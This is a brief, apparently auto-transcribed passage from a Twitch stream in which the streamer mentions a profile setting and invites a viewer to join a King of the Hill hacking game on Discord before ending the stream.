nice. So if you go to profile, if you're getting that message about advanced users, you have to go to your profile, and then I think it's on. Okay, perfect. Oh wow, I'm sitting here streaming my whole frickin' everything. Gonna get doxxed. I should really get off Twitch.
I didn't even hear streaming.
Oh yeah, everybody can hear you on stream.
Like, no, I don't care.
All right. Hunterbot, yes, we're doing King of the Hill. If Hunterbot's watching on Twitch, go ahead and jump into, what are we in, box hacking? On
Yeah.
the Discord. And then there's a link in general on the Discord if you want to play with us, Hunterbot. But I'm going to end the stream so I don't accidentally